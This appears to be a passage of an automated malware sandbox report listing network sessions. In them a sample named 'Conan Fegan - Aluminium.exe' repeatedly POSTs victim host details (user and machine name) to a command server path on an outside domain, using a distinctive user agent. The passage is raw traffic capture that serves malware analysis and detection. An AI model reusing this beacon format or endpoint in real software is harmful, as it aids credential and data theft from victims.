                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:29.005323887 CET6226INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:28 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          66192.168.2.449835203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:29.542202950 CET6227OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:29.876545906 CET6227OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:30.244988918 CET6235INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:30 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          67192.168.2.449837203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:30.810538054 CET6239OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:31.145735979 CET6240OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:31.511131048 CET6240INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:31 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          68192.168.2.449839203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:32.137482882 CET6250OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:32.474783897 CET6251OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:32.846445084 CET6251INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:32 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          69192.168.2.449840203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:33.411950111 CET6252OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:33.749093056 CET6252OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:34.116691113 CET6252INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:33 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          7192.168.2.449754203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:12.128792048 CET1543OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:12.465974092 CET1543OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:12.833798885 CET1544INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:12 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          70192.168.2.449841203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:34.725025892 CET6253OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:35.073873043 CET6254OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:35.450486898 CET6254INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:35 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          71192.168.2.449842203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:36.028479099 CET6255OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:36.364825964 CET6255OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:36.741519928 CET6255INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:36 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          72192.168.2.449843203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:37.334441900 CET6256OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:37.668834925 CET6257OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:38.034826040 CET6257INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:37 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          73192.168.2.449844203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:38.623261929 CET6258OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:38.961205006 CET6258OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:39.339082003 CET6258INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:39 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          74192.168.2.449845203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:39.953346014 CET6259OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:40.299132109 CET6260OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:40.683614016 CET6260INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:40 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          75192.168.2.449846203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:41.267887115 CET6261OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:41.603157043 CET6261OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:41.979253054 CET6261INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:41 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          76192.168.2.449847203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:42.561340094 CET6262OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:42.895849943 CET6263OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:43.262561083 CET6263INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:43 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          77192.168.2.449848203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:43.857917070 CET6264OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:44.196196079 CET6264OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:44.564707994 CET6265INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:44 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          78192.168.2.449849203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:45.133831978 CET6266OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:45.479481936 CET6266OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:45.854491949 CET6267INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:45 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          79192.168.2.449850203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:46.440406084 CET6268OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:46.785778046 CET6268OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:47.171031952 CET6268INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:47 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          8192.168.2.449755203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:13.445902109 CET1545OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:13.780885935 CET1545OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:14.146862984 CET1545INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:14 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          80192.168.2.449851203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:47.730696917 CET6269OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:48.079566956 CET6270OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:48.464941978 CET6270INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:48 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          81192.168.2.449852203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:49.051549911 CET6271OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:49.390254974 CET6271OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:49.756752014 CET6271INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:49 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          82192.168.2.449853203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:50.340811014 CET6272OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:50.675412893 CET6273OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:51.040293932 CET6273INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:50 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
